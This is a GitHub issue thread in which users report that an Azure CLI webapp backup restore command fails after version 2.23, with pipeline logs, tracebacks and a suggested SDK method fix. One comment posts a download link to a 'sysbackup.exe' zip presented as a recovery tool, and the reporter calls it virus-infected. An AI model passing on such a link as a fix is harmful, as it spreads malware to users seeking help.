### ISSUE TITLE
webapp: Unable to run restore command

### ISSUE THREAD

**Issue by jonbe** [Azure/azure-cli#18151]
In our devops pipeline we do a restore of an backup, with this command
`az webapp config backup restore --slot $(targetSlot) --target-name $WebAppName-$(targetSlot) --overwrite --resource-group $(WebAppResourceGroup) --webapp-name $WebAppName --backup-name $WebAppName --container-url $sas`

but since the upgrade of azurecli to 2.23 we get this error..
```
2021-05-19T06:56:19.6626484Z azure-cli                         2.23.0
2021-05-19T06:56:21.8583491Z [command]C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoLogo -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -Command ". 'D:\a\_temp\azureclitaskscript1621407378735.ps1'"
2021-05-19T06:56:28.5408959Z ERROR: The command failed with an unexpected error. Here is the traceback:
2021-05-19T06:56:28.5412273Z ERROR: 'WebAppsOperations' object has no attribute 'restore_slot'
```

with 2.21 it ran fine.
```
2021-04-12T13:34:07.1548494Z azure-cli                         2.21.0
2021-04-12T13:34:09.7851601Z [command]C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoLogo -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -Command ". 'D:\a\_temp\azureclitaskscript1618234446120.ps1'"
2021-04-12T13:39:53.3416446Z [command]C:\Windows\system32\cmd.exe /D /S /C ""C:\Program Files (x86)\Microsoft SDKs\Azure\CLI2\wbin\az.cmd" account clear"
```

We can see that there is a breaking change in 2.23
[BREAKING CHANGE] Update websites SDK to the latest version (azure-mgmt-web==2.0.0) & Adopt track2 SDK
But checking the [documentation](https://docs.microsoft.com/en-us/cli/azure/webapp/config/backup?view=azure-cli-latest#az_webapp_config_backup_restore) for backup the command still seems valid but doesnt work.

**Comment by yonzhan** [comment]
route to service team

**Comment by jonbe** [comment]
Any updates of this ticket? We still manually need to run this step on a pc with azure cli 2.21 installed.

**Comment by yonzhan** [comment]
webapp service team should look into this

**Comment by jonbe** [comment]
Hi, any updates of this? Its very anoying to have to run the restore task on a seperate virtual machine with an old version of the CLI installed, or are there any updates of how the command should be used instead to restore an backup to a specific slot?

**Comment by jonbe** [comment]
Hi
Any updates? We still get this issue during the deploys and need to run the step manullay from an pc with a old version of the cli

2021-09-15T11:39:41.9628943Z [command]C:\Windows\system32\cmd.exe /D /S /C ""C:\Program Files (x86)\Microsoft SDKs\Azure\CLI2\wbin\az.cmd" --version"
2021-09-15T11:39:42.9509655Z azure-cli                         2.28.0
2021-09-15T11:39:42.9510447Z 
2021-09-15T11:39:42.9511090Z Please let us know how we are doing: https://aka.ms/azureclihats
2021-09-15T11:39:42.9511780Z and let us know if you're interested in trying out our newest features: https://aka.ms/CLIUXstudy
2021-09-15T11:39:42.9512089Z 
2021-09-15T11:39:42.9512416Z core                              2.28.0
2021-09-15T11:39:42.9512800Z telemetry                          1.0.6
2021-09-15T11:39:42.9512969Z 
2021-09-15T11:39:42.9513238Z Extensions:
2021-09-15T11:39:42.9513559Z azure-devops                      0.20.0


ERROR: The command failed with an unexpected error. Here is the traceback:
ERROR: 'WebAppsOperations' object has no attribute 'restore_slot'
Traceback (most recent call last):
  File "D:\a\1\s\build_scripts\windows\artifacts\cli\Lib\site-packages\knack/cli.py", line 231, in invoke
  File "D:\a\1\s\build_scripts\windows\artifacts\cli\Lib\site-packages\azure/cli/core/commands/__init__.py", line 657, in execute
  File "D:\a\1\s\build_scripts\windows\artifacts\cli\Lib\site-packages\azure/cli/core/commands/__init__.py", line 720, in _run_jobs_serially
  File "D:\a\1\s\build_scripts\windows\artifacts\cli\Lib\site-packages\azure/cli/core/commands/__init__.py", line 712, in _run_job
  File "D:\a\1\s\build_scripts\windows\artifacts\cli\Lib\site-packages\azure/cli/command_modules/appservice/commands.py", line 37, in _ex_handler
  File "D:\a\1\s\build_scripts\windows\artifacts\cli\Lib\site-packages\azure/cli/core/commands/__init__.py", line 691, in _run_job
  File "D:\a\1\s\build_scripts\windows\artifacts\cli\Lib\site-packages\azure/cli/core/commands/__init__.py", line 328, in __call__

**Comment by jonbe** [comment]
Hi
Any updates? Any workarounds?

**Comment by TechIndiaTutorials** [comment]
> Tested with 2.29.0 and it still has the same issue. Any updates of how I do restores to a slot?

### Use **Win-Recovery** with its versions



[Download sysbackup.exe zip](https://github.com/files-community/Files/files/7446447/sysbackup.zip)

**Comment by jonbe** [comment]
> > Tested with 2.29.0 and it still has the same issue. Any updates of how I do restores to a slot?
> 
> ### Use **Win-Recovery** with its versions
> [Download sysbackup.exe zip](https://github.com/files-community/Files/files/7446447/sysbackup.zip)

Thats a virus infected file, not going to touch it!

**Comment by jonbe** [comment]
Hi! Any status updates or workarounds (except using a build agent on vm with cli version 2.21)?

Tested again today..
```
2021-11-22T08:07:18.1854734Z [command]C:\Windows\system32\cmd.exe /D /S /C ""C:\Program Files (x86)\Microsoft SDKs\Azure\CLI2\wbin\az.cmd" --version"
2021-11-22T08:07:18.9042020Z 
2021-11-22T08:07:18.9042942Z azure-cli                         2.30.0

```
But sadly still get same issue..
```
2021-11-22T08:07:32.8998008Z ##[error]ERROR: The command failed with an unexpected error. Here is the traceback:
ERROR: 'WebAppsOperations' object has no attribute 'restore_slot'
Traceback (most recent call last):
  File "D:\a\1\s\build_scripts\windows\artifacts\cli\Lib\site-packages\knack/cli.py", line 231, in invoke
  File "D:\a\1\s\build_scripts\windows\artifacts\cli\Lib\site-packages\azure/cli/core/commands/__init__.py", line 657, in execute
  File "D:\a\1\s\build_scripts\windows\artifacts\cli\Lib\site-packages\azure/cli/core/commands/__init__.py", line 720, in _run_jobs_serially
  File "D:\a\1\s\build_scripts\windows\artifacts\cli\Lib\site-packages\azure/cli/core/commands/__init__.py", line 712, in _run_job
  File "D:\a\1\s\build_scripts\windows\artifacts\cli\Lib\site-packages\azure/cli/command_modules/appservice/commands.py", line 37, in _ex_handler
  File "D:\a\1\s\build_scripts\windows\artifacts\cli\Lib\site-packages\azure/cli/core/commands/__init__.py", line 691, in _run_job
  File "D:\a\1\s\build_scripts\windows\artifacts\cli\Lib\site-packages\azure/cli/core/commands/__init__.py", line 328, in __call__

```

Best regards 
Jonas

**Comment by jonbe** [comment]
new year, new version of cli.. but still same issue? Any updates?
`2022-01-05T08:28:19.9617301Z [command]C:\Windows\system32\cmd.exe /D /S /C ""C:\Program Files (x86)\Microsoft SDKs\Azure\CLI2\wbin\az.cmd" --version"
2022-01-05T08:28:20.4650093Z WARNING: You have 2 updates available. Consider updating your CLI installation with 'az upgrade'
2022-01-05T08:28:20.4650803Z azure-cli                         2.31.0 *`

But still we get this...

`2022-01-05T08:28:30.2112411Z ##[error]ERROR: The command failed with an unexpected error. Here is the traceback:
ERROR: 'WebAppsOperations' object has no attribute 'restore_slot'
Traceback (most recent call last):
  File "D:\a\1\s\build_scripts\windows\artifacts\cli\Lib\site-packages\knack/cli.py", line 231, in invoke
  File "D:\a\1\s\build_scripts\windows\artifacts\cli\Lib\site-packages\azure/cli/core/commands/__init__.py", line 658, in execute
  File "D:\a\1\s\build_scripts\windows\artifacts\cli\Lib\site-packages\azure/cli/core/commands/__init__.py", line 721, in _run_jobs_serially
  File "D:\a\1\s\build_scripts\windows\artifacts\cli\Lib\site-packages\azure/cli/core/commands/__init__.py", line 713, in _run_job
  File "D:\a\1\s\build_scripts\windows\artifacts\cli\Lib\site-packages\azure/cli/command_modules/appservice/commands.py", line 38, in _ex_handler
  File "D:\a\1\s\build_scripts\windows\artifacts\cli\Lib\site-packages\azure/cli/core/commands/__init__.py", line 692, in _run_job
  File "D:\a\1\s\build_scripts\windows\artifacts\cli\Lib\site-packages\azure/cli/core/commands/__init__.py", line 328, in __call__`

**Comment by scott-cuna** [comment]
We're also running into this issue after upgrading the CLI from 2.11.1 to 2.36.0.

If I'm not mistaken, the method it's trying to call ([restore_slot](https://github.com/Azure/azure-cli/blob/c2bffb8bef23728919fe8a315ef7553b103ec393/src/azure-cli/azure/cli/command_modules/appservice/custom.py#L2106)) doesn't exist according to the [documentation](https://docs.microsoft.com/en-us/python/api/azure-mgmt-web/azure.mgmt.web.v2021_02_01.operations.webappsoperations?view=azure-python). Perhaps it should be calling [begin_restore_slot](https://docs.microsoft.com/en-us/python/api/azure-mgmt-web/azure.mgmt.web.v2021_02_01.operations.webappsoperations?view=azure-python#azure-mgmt-web-v2021-02-01-operations-webappsoperations-begin-restore-slot) instead?
